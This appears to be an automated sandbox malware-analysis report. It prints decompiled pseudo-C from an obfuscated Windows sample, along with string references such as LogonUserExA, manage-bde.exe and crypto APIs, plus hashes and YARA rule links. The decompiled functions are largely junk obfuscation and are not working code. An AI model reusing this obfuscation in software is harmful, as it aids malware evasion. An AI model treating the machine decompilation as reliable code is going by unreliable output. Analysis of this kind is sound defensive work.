0x004c4ac5
0x004c4ace
0x004c4adc
0x004c4ae7
0x004c4b0a
0x004c4b14
0x004c4b1a
0x004c4b1c
0x004c4b1c
0x004c4b2c
0x004c4b2f
0x004c4b36
0x004c4b47
0x004c4b4d
0x004c4b74
0x004c4b78
0x004c4b7b
0x004c4b7e
0x004c4b7e
0x004c4b88
0x004c4b93
0x004c4b9d
0x004c4ba3
0x004c4ba4
0x004c4bb8
0x004c4bbd
0x004c4bc4
0x004c4bcc
0x004c4bd3
0x004c4bd7
0x004c4be0
0x004c4beb
0x004c4bf0
0x004c4bfb
0x004c4c02
0x004c4c02
0x004c4bfb
0x004c4c0f
0x004c4c15
0x004c4c1a
0x004c4c28
0x004c4c2f
0x004c4c31
0x004c4c37
0x004c4c3b
0x004c4c3b
0x004c4c42
0x004c4c44
0x004c4c46
0x004c4c47
0x004c4c4e
0x004c4c53
0x004c4c56
0x004c4c60
0x004c4c62
0x004c4c68
0x004c4c68
0x004c4c72
0x004c4c7b
0x004c4c95
0x004c4cb8
0x004c4cc8
0x004c4cd4
0x004c4cdc
0x004c4ce7
0x004c4cf7
0x004c4cfd
0x004c4cff
0x004c4d01
0x004c4d01
0x004c4d06
0x004c4d06
0x004c4d16
0x004c4d33
0x004c4d3f
0x004c4d48
0x004c4d4b
0x004c4d52
0x004c4d5d
0x004c4d74
0x004c4da8
0x00000000
0x004c4d76
0x004c4d7e
0x004c4d84
0x004c4d8b
0x004c4d95
0x004c4da6
0x004c4dac
0x004c4dac
0x004c4db3
0x004c4dbb
0x004c4dc8
0x004c4dde
0x004c4de7
0x004c4deb
0x004c4df5
0x004c4df8
0x004c4dfe
0x004c4e00
0x004c4e00
0x004c4e01
0x004c4e01
0x004c4e08
0x004c4e17
0x004c4e17
0x004c4e1c
0x004c4e1e
0x004c4e20
0x004c4e2a
0x004c4e3e
0x004c4e44
0x004c4e57
0x004c4e5c
0x004c4e65
0x004c4e6c
0x00000000
0x004c4e2c
0x004c4e33
0x004c4e74
0x004c4e77
0x004c4e8c
0x004c4ea2
0x004c4eab
0x004c4eb2
0x004c4eb6
0x004c4ec1
0x004c4ec8
0x004c4ed3
0x004c4edb
0x004c4edd
0x004c4edd
0x004c4ee1
0x004c4ee8
0x004c4efb
0x004c4f0c
0x004c4f0d
0x004c4f12
0x004c4f17
0x004c4f17
0x004c4e37
0x004c4e38
0x004c4e3c
0x00000000
0x004c4e3c
0x004c4e2a
0x00000000
0x004c4da6
0x004c4d74
0x004c4b0c
0x00000000
0x004c4b0c

Strings

PortableDeviceWMDRM.dll, xrefs: 004C4EBC
MXEAgent.dll, xrefs: 004C4D20
0oy, xrefs: 004C4E65
KBDBGPH.DLL, xrefs: 004C4BAC
CoRevokeInitializeSpy, xrefs: 004C4E57
api-ms-win-core-libraryloader-l1-1-0.dll, xrefs: 004C4E85
Microsoft.Build.Engine.dll, xrefs: 004C4A08, 004C4E4A
user.exe, xrefs: 004C49FA

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID:
String ID: 0oy$CoRevokeInitializeSpy$KBDBGPH.DLL$MXEAgent.dll$Microsoft.Build.Engine.dll$PortableDeviceWMDRM.dll$api-ms-win-core-libraryloader-l1-1-0.dll$user.exe
API String ID: 0-979960885
Opcode ID: 800e18e09d746f7db92fd9063e982bcbddd4aca370d6f8d5559184dbf48728ac
Instruction ID: 0339f95a4f2e33d7b5f47f2dc538f86f042ec06f3cffcf685de3b55e631196ad
Opcode Fuzzy Hash: 800e18e09d746f7db92fd9063e982bcbddd4aca370d6f8d5559184dbf48728ac
Instruction Fuzzy Hash: 0BC13459E042428BDB00AFB9FD947F53BB3FF6A324B00413BD94483366E2694916C7AD

Uniqueness

Uniqueness Score: -1.00%

Function 00499BD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00499C23

Strings

0oy, xrefs: 00499CBA
LogonUserExA, xrefs: 00499C59
user.exe, xrefs: 00499C6E, 00499D09

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: AddressProc
String ID: 0oy$LogonUserExA$user.exe
API String ID: 190572456-3801206681
Opcode ID: 764a82c6f4bcf2fb3e6199e4239d07f7f540bf24c25846bceec77cd83327ce9b
Instruction ID: b62ab6ff983978ee2fdcf0e2a04818fc91f7625a749861f7c7f2c25be95df03e
Opcode Fuzzy Hash: 764a82c6f4bcf2fb3e6199e4239d07f7f540bf24c25846bceec77cd83327ce9b
Instruction Fuzzy Hash: 6531C171E043069BCB00EF78E9856E97BF2EB29310F40817AD908E7321E3780A64CB4C

Uniqueness

Uniqueness Score: -1.00%

Function 004A32B3 Relevance: 6.4, Strings: 5, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E004A32B3(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _t18;
				intOrPtr _t22;
				char _t36;
				char _t44;
				short _t68;
				short _t71;
				short _t87;
				intOrPtr _t96;
				void* _t97;
				void* _t103;

				_t97 = __edi;
				_t18 =  *0x4fff1b; // 0x0
				if(_t18 <= 7) {
					 *0x4fd0ae =  *0x4fd0ae - __ebx;
					_t71 =  *0x4fd194; // 0x67c5
					 *0x4fd1fa = 0x85df;
					_t103 = __esi + 1;
					 *0x4ff4eb =  *0x4ff4eb + _t103;
					if(0xa9215c == 0) {
						L7:
						 *0x4fd168 = _t71;
						goto L8;
					} else {
						 *0x4fff1e = 0xa9215c;
						_t43 = 0x160170;
						 *0x4fd066 =  *0x4fd066;
						 *0x4fd07e =  *0x4fd07e;
						_t63 = 0x47813f;
						if(0x58 == _t71) {
							 *0x4fe663 =  *0x4fe663 - 0xffffffffffffd894;
							 *0x4fd1b2 = 0xffffffffffffd894;
							_t96 =  *0x4fd1e6; // 0x8656
							_t87 = _t96 - 0x9e92;
							if(_t103 < 0) {
								if(_t103 < 0) {
									L8:
									_t87 = 0x80dbc4;
									 *0x4fff18 =  *0x4fff18 - 0x80dbc4;
									 *0x4fff18 =  *0x4fff18 - 0x80dbc4;
								} else {
									 *0x4fff1d = 0x160170;
									 *0x4fd038 =  *0x4fd038;
									if(0x47813f > 0x313b) {
										_v20 = 0x47813f;
										_t71 = 0x608a;
										_v28 = _v28 - 0x608a;
										goto L7;
									}
								}
								_t103 = _t103 - 1;
								 *0x4ff72b =  *0x4ff72b - _t103;
								 *0x4fd743 =  *0x4fd743 + _t97;
								 *0x4fff12 =  *0x4fff12 + 0x58;
								_v16 = 0x58;
							}
							 *0x4fd1ba = _t87;
							 *0x4fedab =  *0x4fedab - _t103;
							_t36 =  *0x4fff1b; // 0x0
							 *0x4fd6fd =  *0x4fd6fd - _t97;
							 *0x4fd715 =  *0x4fd715 + _t97;
							_v12 = _t36 - 0xdb + 1;
							_t63 = 0x175b75a;
							 *0x4fff16 =  *0x4fff16 + 0x6a83;
							_t71 = 0;
							 *0x4fd222 = 0x8b;
							 *0x4fff1d = 0xc4;
							_t97 = 0x4fd718;
							 *0x4fff10 = 0xc4;
							 *0x4fd4df = 0xc4;
							_t43 = _v12;
						}
					}
					_v16 = _v16 - _t63;
					 *0x4fff12 =  *0x4fff12 + _t63;
					 *0x4fff15 =  *0x4fff15 - _t71;
					_t68 =  *0x4fd18c; // 0x7a01
					_t44 = _t43 + 0xb5;
					 *0x4fff19 =  *0x4fff19 + _t44;
					 *0x4fff1b = _t44;
				}
				 *0x4ffc9c =  *0x4ffc9c + _t97;
				 *0x4fff1e = 0xe6;
				_t22 =  *0x4fd3e3;
				 *0x4fff11 =  *0x4fff11 - _t22;
				 *0x4fd05a =  *0x4fd05a + _t22;
				 *0x4fff14 =  *0x4fff14 - 0x36f9d4;
				_v24 = 0x36f9d4;
				 *0x4fd10e = _t68;
				 *0x4fd176 =  *0x4fd176 - 0x6c9a;
				_v32 = _v32 - 0x6c9a;
				 *0x4fff18 =  *0x4fff18 - 0x9be9;
				return _t22 + _t22;
			}

0x004a32b3
0x004a32bf
0x004a32c7
0x004a32d8
0x004a32e9
0x004a32f4
0x004a3303
0x004a3304
0x004a3310
0x004a33b2
0x004a33b2
0x00000000
0x004a3316
0x004a3316
0x004a3322
0x004a3327
0x004a332e
0x004a333a
0x004a3341
0x004a3355
0x004a335b
0x004a3362
0x004a3369
0x004a3373
0x004a337c
0x004a33bb
0x004a33bb
0x004a33c1
0x004a33c7
0x004a337e
0x004a337e
0x004a3390
0x004a33a2
0x004a33a4
0x004a33ab
0x004a33af
0x00000000
0x004a33af
0x004a33a2
0x004a33d0
0x004a33d3
0x004a33e6
0x004a33f6
0x004a33fc
0x004a3407
0x004a341a
0x004a342d
0x004a3435
0x004a343e
0x004a3445
0x004a3450
0x004a3463
0x004a346f
0x004a3475
0x004a347b
0x004a348a
0x004a3498
0x004a3499
0x004a349e
0x004a34a5
0x004a34a5
0x004a3341
0x004a34a8
0x004a34ab
0x004a34bb
0x004a34cb
0x004a34de
0x004a34e1
0x004a34e7
0x004a34e7
0x004a34f4
0x004a34fa
0x004a3501
0x004a3506
0x004a350c
0x004a351c
0x004a3522
0x004a3525
0x004a3533
0x004a353a
0x004a3546
0x004a354d

Strings

X,<, xrefs: 004A345B
WH*, xrefs: 004A32D3
sqlsrv32.dll, xrefs: 004A3407
speechuxcpl.dll, xrefs: 004A338B
ui, xrefs: 004A3445

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID:
String ID: WH*$X,<$speechuxcpl.dll$sqlsrv32.dll$ui
API String ID: 0-3796493415
Opcode ID: b2f2bb216e850c445102f04d2d1fcc201e440daefad9c4fdd2b25c76255e61e7
Instruction ID: 9f5b5b2956d05ac9925c860680920019d2fbe55c38821c4251341cebc302ba0d
Opcode Fuzzy Hash: b2f2bb216e850c445102f04d2d1fcc201e440daefad9c4fdd2b25c76255e61e7
Instruction Fuzzy Hash: 8E51C6259582418BCB01EF78FC542E57BB2EF2B320744417FC85497772E278462ACBAD

Uniqueness

Uniqueness Score: -1.00%

Function 004C6CE7 Relevance: 6.4, Strings: 5, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E004C6CE7(void* __eax, void* __ebx, signed int __ecx, unsigned int __edi, void* __esi) {
				unsigned short _t13;
				unsigned short _t16;
				unsigned short _t18;
				char _t24;
				void* _t25;
				void* _t27;
				unsigned short _t29;
				void* _t33;
				unsigned short _t35;
				unsigned int _t56;
				signed int _t59;
				intOrPtr _t62;
				void* _t68;
				signed int _t70;
				void* _t75;
				void* _t85;

				_t67 = __edi;
				_t56 = __ecx;
				_t33 = __ebx;
				_push(__eax);
				 *0x4fff19 =  *0x4fff19 - __eax;
				if(__esi < 0) {
					_t67 = __edi >> __ecx;
				}
				_pop(_t13);
				 *(_t85 - 0x20) = _t13;
				 *0x4fff1e = _t13;
				_t68 = _t33 - 0xee;
				_t35 = _t67;
				_push(_t13);
				 *0x4ff954 =  *0x4ff954 + _t68;
				if(_t13 <= 0) {
					_t68 = _t68 + _t68;
					 *0x4fd53f = _t13;
					_t35 =  *(_t85 - 8);
					_t56 = _t56 >> _t56;
					 *0x4fd1fa = 0x9582;
					_t59 = 0x9582 + _t13 - 0x2f03;
					_t13 =  *0x4fd563; // 0x0
				}
				if(_t35 >= 0x38) {
					 *0x4fd114 = _t56;
					_t59 =  *0x4fd1fc; // 0x0
				}
				_pop(_t16);
				 *(_t85 - 8) = _t16;
				_t70 = _t68 - _t68 + _t68 - _t68;
				_t18 =  *(_t85 - 8);
				_push(0x7f00);
				 *0x4ff9a0 =  *0x4ff9a0 + _t70;
				 *(_t85 - 0xc) = _t18;
				 *0x4fff1e = _t18;
				_push( *(_t85 - 0xc));
				 *0x4fdacf =  *0x4fdacf - "speechuxcpl.dll" - 0x22;
				 *0x4fdbfb = 0x3a5dca;
				 *0x4fdd2b = 0x3a5dca;
				_pop(_t24);
				 *0x4fd1e8 = _t59 | 0x000000a9;
				_t62 =  *0x4fd232; // 0x4145
				_push(0);
				 *0x4fff19 = _t24;
				_t25 = _t24;
				_t27 = _t25;
				_t75 = ((_t70 ^ 0x00cdd6e9) + 0x000001e7 & 0x000000e6) - 0x2f0f1;
				_t29 = _t27;
				if(_t75 < 0) {
					L9:
					 *0x4fff1e = _t29;
				} else {
					_t75 = _t75 - 0xfffffffffffff51f;
					if(_t29 != 0x2a786f) {
						 *0x4fd162 = 0;
						 *0x4fd1fa = _t62 + 0x784148;
						 *0x4fff1b = 0xcf;
						goto L9;
					}
				}
				 *0x4fd983 = _t29;
				_push(0x4c6eb8);
				_push( *0x4fe7d3);
				return _t29;
			}

0x004c6ce7
0x004c6ce7
0x004c6ce7
0x004c6ce7
0x004c6ce8
0x004c6cf1
0x004c6cf9
0x004c6cf9
0x004c6d06
0x004c6d07
0x004c6d0d
0x004c6d12
0x004c6d12
0x004c6d14
0x004c6d1b
0x004c6d23
0x004c6d25
0x004c6d28
0x004c6d37
0x004c6d3c
0x004c6d4a
0x004c6d51
0x004c6d5d
0x004c6d5d
0x004c6d6e
0x004c6d70
0x004c6d7a
0x004c6d7a
0x004c6d83
0x004c6d8a
0x004c6d8f
0x004c6d92
0x004c6d95
0x004c6da6
0x004c6dac
0x004c6daf
0x004c6dc6
0x004c6ddf
0x004c6de5
0x004c6deb
0x004c6df8
0x004c6df9
0x004c6e07
0x004c6e12
0x004c6e18
0x004c6e1e
0x004c6e3a
0x004c6e3d
0x004c6e46
0x004c6e49
0x004c6e91
0x004c6e99
0x004c6e4b
0x004c6e4c
0x004c6e60
0x004c6e6c
0x004c6e79
0x004c6e89
0x00000000
0x004c6e8f
0x004c6e60
0x004c6ea7
0x004c6eac
0x004c6eb1
0x004c6eb7

Strings

CreateActCtxW, xrefs: 004C6D66
@_w, xrefs: 004C6D28
speechuxcpl.dll, xrefs: 004C6DD8
8, xrefs: 004C6D6B
RtlSecondsSince1970ToTime, xrefs: 004C6CFF

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID:
String ID: 8$CreateActCtxW$RtlSecondsSince1970ToTime$speechuxcpl.dll$@_w
API String ID: 0-1583441755
Opcode ID: 7542f0bb646301dc74cb2112b6b0f607acb841e7315342550dc84f38fe8739be
Instruction ID: 62aaaebaf2dd6e0fe0e3ad10dbd29c187249736a3a8ec390aac0d3cd48522c70
Opcode Fuzzy Hash: 7542f0bb646301dc74cb2112b6b0f607acb841e7315342550dc84f38fe8739be
Instruction Fuzzy Hash: 3541F366F002418FD740DF79EC847E93BA3EB6A314B05413BD809D7362E2784A69C76C

Uniqueness

Uniqueness Score: -1.00%

Function 004A715D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 120encryptionCOMMON

Download Yara Rule

APIs

CryptDestroyHash.ADVAPI32(?), ref: 004A71A4

Strings

CNBBR334.DLL, xrefs: 004A725E
disrvpp.dll, xrefs: 004A71E0

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: CryptDestroyHash
String ID: CNBBR334.DLL$disrvpp.dll
API String ID: 174375392-2929537048
Opcode ID: 8f10d36bad762601bcb03cf9d1d33e9839c67b72fa0942685e85f6f5e42004d8
Instruction ID: f8bfb36ca23470504873fa0f5cde08db6772c514a2ce8a8c603449130269cb20
Opcode Fuzzy Hash: 8f10d36bad762601bcb03cf9d1d33e9839c67b72fa0942685e85f6f5e42004d8
Instruction Fuzzy Hash: 8041BF31E442469FDB04DFB9EC84AED7BB2EF2A314F04407AD904E7361E2751A51CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0048766C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00005BFC,00000001), ref: 00487756

Strings

jy:, xrefs: 00487673
RegQueryInfoKeyW, xrefs: 00487683

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID: AddressProc
String ID: RegQueryInfoKeyW$jy:
API String ID: 190572456-3311142157
Opcode ID: 8152aaa43da8e43e23ca859663fa640192414017d3a89bd2b4a17e9983add6f9
Instruction ID: 2720ca44d7e4b4e8ddabc31b119aafc43bd88036678433620277745931988333
Opcode Fuzzy Hash: 8152aaa43da8e43e23ca859663fa640192414017d3a89bd2b4a17e9983add6f9
Instruction Fuzzy Hash: 0821AB74E143049BCB00EFB8E8D9ADD7BB2EB19310F54817AD984E3762D2781A54CB4C

Uniqueness

Uniqueness Score: -1.00%

Function 004B121F Relevance: 5.1, Strings: 4, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004B121F(intOrPtr __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* _t12;
				intOrPtr* _t15;
				void* _t16;
				void* _t32;
				short _t35;
				short _t47;
				void* _t51;

				_t32 = __ecx;
				 *0x4fd03a =  *0x4fd03a - "LogonUserExA";
				E004A47B2("LogonUserExA", __ebx, __ecx, 0x8ee0e4, __edi, "LogonUserExA");
				if(__ebx == 0x31f8) {
					 *0x4fdd47 = __ebx;
				}
				if(_t32 == _t32) {
					 *0x4fd152 =  *0x4fd152 + _t32;
				}
				 *0x4fff12 =  *0x4fff12 + 0x502c6f;
				E004FD13E = 0x80d0;
				_t35 = 0x7c10;
				 *((intOrPtr*)(_t51 - 8)) =  *((intOrPtr*)(_t51 + 8));
				_t12 =  *((intOrPtr*)(_t51 - 8)) + 0x22;
				 *0x4fff1e =  *0x4fff1e + _t12;
				 *0x4fd088 =  *0x4fd088 + 0x1ed4c0;
				 *0x4fff18 =  *0x4fff18 - 0x16;
				_t47 = 0;
				_t15 = _t12;
				if(_t15 > 0) {
					L7:
					if(_t47 >= 0x2e) {
						if(_t15 <= 0xe4e18) {
							goto L12;
						} else {
							_t28 = "CoRevokeInitializeSpy";
							goto L10;
						}
						goto L13;
					}
				} else {
					_t28 = 0xfe;
					if(_t15 != 6) {
						L10:
						if(_t28 == _t28 || _t35 <= _t35) {
							L12:
							 *0x4fd14a = _t35;
						}
						L13:
						_t47 =  *0x4fd196; // 0x0
						 *0x4fd1e2 = _t47;
					} else {
						_t35 = ("CNBBR334.DLL" & 0x00006c79) + 0x76 - 1;
						goto L7;
					}
				}
				_t16 =  *_t15;
				return _t16;
			}

0x004b121f
0x004b122d
0x004b1235
0x004b1244
0x004b1246
0x004b1246
0x004b1255
0x004b1257
0x004b1257
0x004b1276
0x004b1287
0x004b1291
0x004b1295
0x004b12a7
0x004b12a9
0x004b12c0
0x004b12cf
0x004b12d5
0x004b12e3
0x004b12e6
0x004b1312
0x004b1316
0x004b131d
0x00000000
0x004b131f
0x004b1328
0x00000000
0x004b1328
0x00000000
0x004b131d
0x004b12e8
0x004b12ed
0x004b12f1
0x004b132f
0x004b1331
0x004b1338
0x004b1338
0x004b1338
0x004b133f
0x004b1346
0x004b134d
0x004b12f3
0x004b1311
0x00000000
0x004b1311
0x004b12f1
0x004b1359
0x004b135b

Strings

CoRevokeInitializeSpy, xrefs: 004B1328
LogonUserExA, xrefs: 004B1228, 004B1234
CNBBR334.DLL, xrefs: 004B1303
RegQueryInfoKeyW, xrefs: 004B12F7

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID:
String ID: CNBBR334.DLL$CoRevokeInitializeSpy$LogonUserExA$RegQueryInfoKeyW
API String ID: 0-346474278
Opcode ID: 27883f56f1b7eea50932afbd05654a495bb5732512388e6c8ec72ec764e858a2
Instruction ID: 44e26d5193da6742d0d544e3d7e849ba591dab046ed915efb0161be5e3b269d8
Opcode Fuzzy Hash: 27883f56f1b7eea50932afbd05654a495bb5732512388e6c8ec72ec764e858a2
Instruction Fuzzy Hash: 1821F8A5B102418BDB009B65FCE05F637B3FB6A3147844137CA45C7B76E639485AC35C

Uniqueness

Uniqueness Score: -1.00%

Function 004EAB82 Relevance: 3.8, Strings: 3, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E004EAB82(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				intOrPtr _t20;
				char _t23;
				intOrPtr _t24;
				void* _t29;
				void* _t50;
				short _t52;
				short _t56;
				void* _t69;

				_t50 = __ecx;
				 *0x4fda5b =  *0x4fda5b + "manage-bde.exe";
				 *((intOrPtr*)(_t69 - 8)) = 0;
				_t56 = __edx + 0x98;
				_t20 =  *((intOrPtr*)(_t69 - 8));
				if(_t20 > 9) {
				}
				 *((intOrPtr*)(_t69 - 8)) = _t20;
				 *0x4fff18 =  *0x4fff18 + _t56;
				 *0x4fd220 = _t56;
				_push(0);
				_pop(_t23);
				 *0x4fff19 = _t23;
				 *((intOrPtr*)(_t69 - 8)) = 0;
				_t52 = _t50 + 1;
				_t24 =  *((intOrPtr*)(_t69 - 8));
				 *0x4fff11 =  *0x4fff11 - _t24;
				 *((intOrPtr*)(_t69 - 0xc)) = _t24;
				_t29 =  *((intOrPtr*)(_t69 - 0xc));
				if(_t29 < 0xaa5) {
					 *((intOrPtr*)(_t69 - 8)) =  *((intOrPtr*)(_t69 - 8)) + 0x33f98a;
					 *0x4fd16a = _t52;
				}
				return  *((intOrPtr*)(_t69 - 0x89));
			}

0x004eab82
0x004eab96
0x004eaba5
0x004eabaa
0x004eabad
0x004eabb2
0x004eabb2
0x004eabc5
0x004eabc8
0x004eabce
0x004eabe2
0x004eabe9
0x004eabea
0x004eabf0
0x004eabf5
0x004eac04
0x004eac0c
0x004eac12
0x004eac47
0x004eac52
0x004eac5c
0x004eac67
0x004eac67
0x004eac77

Strings

manage-bde.exe, xrefs: 004EAB91
api-ms-win-core-libraryloader-l1-1-0.dll, xrefs: 004EAC30
RegQueryInfoKeyW, xrefs: 004EABBB

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID:
String ID: RegQueryInfoKeyW$api-ms-win-core-libraryloader-l1-1-0.dll$manage-bde.exe
API String ID: 0-3823345191
Opcode ID: 54d94470a1ff0f328727adf154c929ca995529c42f164a7bb9f91805e88a861f
Instruction ID: b66dae628c309c1c4c1490422bf9edac8e8fc8c114030738c671c9dc221395fb
Opcode Fuzzy Hash: 54d94470a1ff0f328727adf154c929ca995529c42f164a7bb9f91805e88a861f
Instruction Fuzzy Hash: B021B075F042449FC700CFA8E8C06E9BBF2EB1D310F4141BB9A48E7312D6741A92CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004BC614 Relevance: 3.8, Strings: 3, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004BC614() {
				intOrPtr _v12;
				intOrPtr _v20;
				signed int _v28;
				char _t7;
				char _t14;
				char* _t17;
				intOrPtr _t20;
				void* _t27;

				_t7 =  *0x4fd513; // 0x5c9c600
				_push(0);
				 *0x4fff1d = _t7;
				if(_t27 > 0) {
					L3:
					if(_t17 < _t17) {
						_t17 = "scavengeui.dll";
						_t20 =  *0x4fd17e; // 0x4cbd
					}
					 *0x4fd1ca = 0x15a;
					 *0x4fff1b = _t7;
					L6:
					_v28 =  !(_t17 - 1);
					_push(2);
					 *0x4fd152 =  *0x4fd152 - _t20;
					 *0x4fd1ea = 0xcf;
					_t14 =  *0x4fff19; // -107
					 *0x4fff1b = _t14;
					 *0x4fff1e = 0;
					_push(E004BC6DE);
					goto ( *0x4fe19f);
				}
				if(_t7 >= 0) {
					goto L6;
				}
				_t7 = _v12;
				 *0x4fd07e =  *0x4fd07e - _t7;
				_v20 = _v20 + _t17;
				_t17 =  &(_t17[_t17]);
				goto L3;
			}

0x004bc61d
0x004bc622
0x004bc624
0x004bc62b
0x004bc645
0x004bc647
0x004bc649
0x004bc654
0x004bc654
0x004bc65b
0x004bc66b
0x004bc67d
0x004bc68a
0x004bc68d
0x004bc68f
0x004bc69c
0x004bc6a6
0x004bc6ac
0x004bc6be
0x004bc6cd
0x004bc6d8
0x004bc6d8
0x004bc631
0x00000000
0x00000000
0x004bc635
0x004bc638
0x004bc63f
0x004bc642
0x00000000

Strings

CNHI06S.DLL, xrefs: 004BC67D
RtlSecondsSince1970ToTime, xrefs: 004BC6C8
scavengeui.dll, xrefs: 004BC649

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID:
String ID: CNHI06S.DLL$RtlSecondsSince1970ToTime$scavengeui.dll
API String ID: 0-4280048921
Opcode ID: b6cdf0726d929335da5fc6b07fc189d87d771b11a0e6d6ea36a9405d9db2b4d5
Instruction ID: 5655f4874781f9c997ce3afa72814e90f9863cee1e9d1e7d6a283cefeb1c0dc5
Opcode Fuzzy Hash: b6cdf0726d929335da5fc6b07fc189d87d771b11a0e6d6ea36a9405d9db2b4d5
Instruction Fuzzy Hash: AF1127269446458BD7008B7DAC946F57BB1EB3A724F00123AC668C73B1D7690906C3EC

Uniqueness

Uniqueness Score: -1.00%

Function 004BBBE5 Relevance: 3.8, Strings: 3, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E004BBBE5(void* __edi, void* __esi) {
				char _t8;
				signed int _t13;
				intOrPtr _t26;
				void* _t32;

				_t8 =  *((intOrPtr*)(_t32 - 0xc));
				_t23 =  *((intOrPtr*)(_t32 + 0xc));
				_t26 =  *0x4fd218; // 0x6800
				 *0x4fff1b = _t8;
				 *0x4fff1e = _t8;
				 *((intOrPtr*)(_t32 - 0xc)) = _t8;
				 *((intOrPtr*)(_t32 - 0x20)) =  *((intOrPtr*)(_t32 + 0xc));
				 *((intOrPtr*)(_t32 - 8)) = _t8;
				_t13 = E0049D0D9("KBDBGPH.DLL" + "KBDBGPH.DLL",  *((intOrPtr*)(_t32 + 0xc)) + _t23 + 1, _t26, __edi + 0x0000e538 & 0x000172f2, __esi + __esi);
				_push(_t13);
				_push(_t13);
				_push(_t13);
				_push(E004BBC5A);
				_push(E004B3872);
				return _t13;
			}

0x004bbbe5
0x004bbbf4
0x004bbbf7
0x004bbc00
0x004bbc0d
0x004bbc23
0x004bbc28
0x004bbc2e
0x004bbc47
0x004bbc4c
0x004bbc4d
0x004bbc4e
0x004bbc4f
0x004bbc54
0x004bbc59

Strings

KBDBGPH.DLL, xrefs: 004BBC38
sspicli.dll, xrefs: 004BBBED
F%8, xrefs: 004BBBE8

Memory Dump Source

Source File: 00000005.00000002.504839671.0000000000400000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_EE5A.jbxd

Similarity

API ID:
String ID: F%8$KBDBGPH.DLL$sspicli.dll
API String ID: 0-86816983
Opcode ID: 0dbbd4df83871cc25b90351efc2344f67bbb541894df1783f59fd4b29b36f0c6
Instruction ID: 12fbf8df9645feeb7c96cfa2248019666ea736bc8c9cbe41e5687fd4ee06b63f
Opcode Fuzzy Hash: 0dbbd4df83871cc25b90351efc2344f67bbb541894df1783f59fd4b29b36f0c6
Instruction Fuzzy Hash: 05F044B5F443449FCB00CF95E8C05E97BB1EB1A310B54407BEA45A7312E2785A45C768

Uniqueness

Uniqueness Score: -1.00%

Function 004C9C5B Relevance: 2.7, Strings: 2, Instructions: 218
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E004C9C5B(void* __eax, void* __ebx, short __ecx, short __edx, void* __edi, signed int __esi) {
				void* _t27;
				char _t28;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t32;
				intOrPtr _t39;
				void* _t40;
				void* _t42;
				char _t43;
				char _t44;
				intOrPtr _t45;
				intOrPtr _t48;
				char _t51;
				intOrPtr _t54;
				intOrPtr _t55;
				void* _t74;
				short _t99;
				short _t101;
				short _t105;
				signed int _t107;
				signed int _t109;
				signed char _t111;
				short _t112;
				void* _t119;
				void* _t123;
				void* _t128;
				void* _t130;
				signed int _t137;
				void* _t143;
				short _t144;
				short _t146;
				void* _t147;

				_t105 = __edx;
				_t99 = __ecx;
				 *0x4fd6fb =  *0x4fd6fb + __edi;
				 *0x4ffc24 =  *0x4ffc24 + __edi;
				_t119 = __edi + __edi;
				 *0x4fd200 = __edx;
				_t137 = (__esi ^ 0x00b965ca) + (__esi ^ 0x00b965ca);
				if((_t137 & 0x00a4ecb3) <= 0) {
					 *0x4ff794 =  *0x4ff794 - _t137;
				}
